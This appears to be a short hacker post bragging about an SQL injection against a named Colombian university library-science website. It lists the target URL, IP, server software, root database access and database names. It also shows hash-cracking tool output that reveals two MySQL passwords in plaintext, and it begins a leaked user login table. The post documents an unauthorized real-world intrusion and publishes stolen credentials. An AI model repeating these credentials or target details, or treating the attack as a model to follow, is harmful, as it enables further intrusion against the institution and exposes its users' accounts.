A client asked us to get into this University, and while analyzing it we saw many vulnerabilities and decided to publish this SQL injection (the easiest one xD). These are the details:
Target: http://bibliotecologia.udea.edu.co/
Host IP: 200.24.17.77
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.1.6
DB Server: MySQL >=5
Resp. Time(avg): 551 ms
Current User: root@localhost
Sql Version: 5.0.22
Current DB: bibliotecologia
System User: root@localhost
DB User & Pass:
Data Bases:
information_schema
GUIE
agenda
bibliotecologia
bibliotecologia3
mysql
ojs
sihv
test
Cracking the MySQL passwords gave us this:
root@bt:~# ./poc 51a71aa84f5e79ad
mysql crack POC (c) 2006 Philippe Vigier & www.sqlhack.com
password for footprint 51a71aa84f5e79ad = 'qazwsx'
root@bt:~# ./poc 7ee747b1438fab32
mysql crack POC (c) 2006 Philippe Vigier & www.sqlhack.com
password for footprint 7ee747b1438fab32 = 'qwe123'
Some more data...
| cal_login | cal_passwd | cal_email |





